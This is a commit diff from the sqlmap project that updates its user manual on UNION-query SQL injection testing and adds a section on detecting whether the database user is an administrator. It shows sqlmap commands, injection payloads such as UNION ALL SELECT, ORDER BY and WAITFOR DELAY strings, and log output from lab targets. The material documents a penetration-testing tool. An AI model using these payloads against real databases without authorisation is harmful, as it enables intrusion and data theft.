PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-15 04:09:02 +00:00
Code Issues Projects Releases Wiki Activity

Updated user's manual

Browse Source
This commit is contained in:
Bernardo Damele
2009-01-19 23:45:54 +00:00
parent c25b49e80e
commit 7adbf5892d
3 changed files with 165 additions and 45 deletions
Download Patch File Download Diff File Expand all files Collapse all files

103
doc/README.html
View File

@@ -187,7 +187,7 @@ in the following section to go ahead with the exploiting.</LI>
vulnerability:</P>
<P>
<UL>
<LI><B>Inferential Blind SQL injection</B>: sqlmap appends to the
<LI><B>Inferential blind SQL injection</B>: sqlmap appends to the
affected parameter in the HTTP request, a syntatically valid SQL statement
string containing a <CODE>SELECT</CODE> sub-statement, or any other SQL
statement whose the user want to retrieve the output.
@@ -1600,7 +1600,7 @@ the real world application it is necessary to provide it.</P>
<P>Options: <CODE>--string</CODE> and <CODE>--regexp</CODE></P>
<P>By default the distinction of a True query by a False one (basic concept
for Inferential Blind SQL injection attacks) is done comparing injected
for Inferential blind SQL injection attacks) is done comparing injected
requests page content MD5 hash with the original not injected page content
MD5 hash.
Not always this concept works because sometimes the page content changes at
@@ -1964,8 +1964,8 @@ time based blind sql injection payload: 'name=luther'; WAITFOR DELAY '0:0:5';
<P>Options: <CODE>--union-test</CODE> and <CODE>--union-tech</CODE></P>
<P>It is possible to test if the target URL is affected by an <B>inband
SQL injection</B> vulnerability.
<P>It is possible to test if the target URL is affected by a <B>UNION query
(inband) SQL injection</B> vulnerability.
Refer to the <EM>Techniques</EM> section for details on this SQL injection
technique.</P>
@@ -1979,38 +1979,46 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" \
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:27] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing
technique
[hh:mm:27] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601'
NULL, NULL, NULL FROM DUAL-- AND 6558=6558'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>By default sqlmap uses the <B><CODE>NULL</CODE> bruteforcing</B> technique to
detect the number of columns within the original <CODE>SELECT</CODE> statement.
It is also possible to change it to <B><CODE>ORDER BY</CODE> clause
bruteforcing</B> with the <CODE>--union-tech</CODE> option.</P>
<P>Further details on these techniques can be found
<A HREF="http://bernardodamele.blogspot.com/2007/07/insight-on-union-query-sql-injection.html">here</A>.</P>
<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1" \
--union-test -v 1
--union-test --union-tech orderby -v 1
[...]
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:29] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:29] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT NULL,
NULL, NULL-- AND 'iBEMR'='iBEMR'
[hh:mm:51] [INFO] testing inband sql injection on parameter 'id' with ORDER BY clause
bruteforcing technique
[hh:mm:51] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.150:80/sqlmap/pgsql/get_int.php?id=1 ORDER BY 3-- AND
1262=1262'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the target URL parameter <CODE>id</CODE> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use this technique which saves a lot of time.</P>
exploitable by the inband SQL injection technique.
In case a case it is strongly recommended to use this technique which saves
a lot of time.</P>
<P>It is strongly recommended to run at least once sqlmap with the
<CODE>--union-test</CODE> option to test if the affected parameter is used
@@ -2048,7 +2056,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing
technique
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming full inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable full inband sql injection
@@ -2141,7 +2150,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.ph
back-end DBMS: MySQL >= 5.0.0
[hh:mm:56] [INFO] fetching database names
[hh:mm:56] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:56] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing
technique
[hh:mm:56] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:56] [INFO] confirming full inband sql injection on parameter 'id'
[hh:mm:56] [WARNING] the target url is not affected by an exploitable full inband sql
@@ -2622,6 +2632,54 @@ current database: 'master'
</P>
<H3>Detect if the DBMS current user is a database administrator</H3>
<P>Option: <CODE>--is-dba</CODE></P>
<P>It is possible to detect if the database management system session user is
a database administrator.</P>
<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:52] [INFO] testing if current user is DBA
[hh:mm:52] [INFO] query: SELECT (CASE WHEN ((SELECT usesuper=true FROM pg_user WHERE
usename=CURRENT_USER OFFSET 0 LIMIT 1)=CHR(116)||CHR(114)||CHR(117)||CHR(101)) THEN 1
ELSE 0 END)
[hh:mm:52] [INFO] retrieved:
[hh:mm:52] [INFO] performed 6 queries in 0 seconds
current user is DBA: 'False'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --is-dba -v 1
[...]
back-end DBMS: Oracle
[16:40:57] [INFO] testing if current user is DBA
[16:40:58] [INFO] query: SELECT (CASE WHEN ((SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE
GRANTEE=SYS.LOGIN_USER AND GRANTED_ROLE=CHR(68)||CHR(66)||CHR(65))=CHR(68)||CHR(66)||CHR(65))
THEN 1 ELSE 0 END) FROM DUAL
[16:40:58] [INFO] retrieved: 1
[16:40:58] [INFO] performed 13 queries in 0 seconds
current user is DBA: 'True'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<H3>Users</H3>
<P>Option: <CODE>--users</CODE></P>
@@ -3484,10 +3542,11 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --sql
[...]
[hh:mm:03] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
[hh:mm:03] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:03] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing
technique
[hh:mm:03] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:03] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:03] [INFO] the target url is affected by an exploitable inband sql injection
[hh:mm:03] [INFO] confirming full inband sql injection on parameter 'id'
[hh:mm:03] [INFO] the target url is affected by an exploitable full inband sql injection
vulnerability
[hh:mm:03] [INFO] query: UNION ALL SELECT NULL, (CHAR(77)+CHAR(68)+CHAR(75)+CHAR(104)+
CHAR(70)+CHAR(67))+ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), (CHAR(32)))